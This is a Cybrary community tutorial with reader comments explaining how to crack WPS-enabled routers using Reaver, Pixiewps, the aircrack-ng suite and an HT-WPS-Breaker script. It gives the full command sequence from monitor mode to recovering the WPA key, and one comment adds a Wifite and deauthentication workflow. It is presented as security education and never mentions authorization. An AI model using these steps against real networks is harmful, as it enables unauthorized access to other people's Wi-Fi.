Hacking WPS via Pixie Dust Attack

April 22, 2016 | Views: 63025

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

This Cybrary 0P3N submission will cover how to use tools such as aircrack suite, Reaver, Pixiewps, & HT-WPS#B to exploit a WPS vulnerability in certain routers.

This attack is carried out on a Machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B).

Here is a list of vulnerable routers:
Spreadsheet of Routers Vulnerable to WPS Exploit

To start, open a terminal as root and run the following commands.


apt-get update

apt-get install reaver aircrack-ng


Once you have ran the following commands, we will use airmon-ng to set our wireless card into monitor mode. (Must have a wireless card capable of packet injection)

First we will check for any interfering processes by using the following command.


airmon-ng check


If processes were found, use the following command to kill them.


airmon-ng check kill


Now to set the card to monitor mode.


airmon-ng start wlan0


Next we will use airodump-ng to scan for wireless access points with WPS enabled.


airodump-ng wlan0mon --wps


Once airodump has found the AP you are attacking, press ctrl+C to stop, then copy down the BSSID & Channel #.

Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.


reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


-i specifies the interface used

-c specifies the channel of the AP. Replace # with the channel number.

-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.

You can also time the reaver process by using the following command.


time reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


If successful, the WPS pin will be passed to reaver and the WPA key will be discovered.


Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.


Using HT-WPS-Breaker to automate the process.

To install, CLICK HERE then drag the .zip to your desktop and run the following commands.

  • cd Desktop
  • unzip HT-WPS-Breaker-master.zip
  • cd HT-WPS-Breaker-master
  • chmod +x HT-WB.sh
  • ./HT-WB.sh or bash HT-WB.sh


This concludes a simple write up of how to use Reaver and other tools to attack a WPS enabled AP.

I have had many questions on how to use Reaver so I hope this helps.

Comment below if you have any questions. (Please keep comments in regards to the topic).


Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. using windows 8 ,what should I do?

  2. How do this on windows 8

  3. I am not able to install it in my windows 10.
    It is showing error while writing the unzip command.I did unzip it manually, then again my PC is showing error saying chmod is not a recognized internal or external command.
    Please help!!!

  4. Hey one simple question u r doing this on linux or windows or mac

  5. When using Kali Linux and intending to do WPS attacks, either via PixieWPS or Reaver, there is a built in program called Wifite that actually automates the process. It uses the Aircrack-ng suite to put your card into monitor mode automatically, including killing interfering processes, and scans surrounding access points. Once you’ve scanned enough AP’s, just ctrl+c and select what AP’s you would like to attack and go. It even shows which AP’s have WPS enabled and if clients are on the network. In order, it will use WPS Pixie attack for a specific amount of time before going to Reaver bruteforce style attack for about 15 minutes before jumping straight into and aircrack-ng style attack with deauthentication of each client. Is it better at cracking the WPS or network key than using the individual programs on their own? No, but it is an easier way by automating the process. I have had success several times on my networks with various passphrases and levels of WPS security including timeout triggers and custom router firmware/embedded systems.

    Just thought I’d add my pair of pennies.

Page 3 of 6«12345»...Last »
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?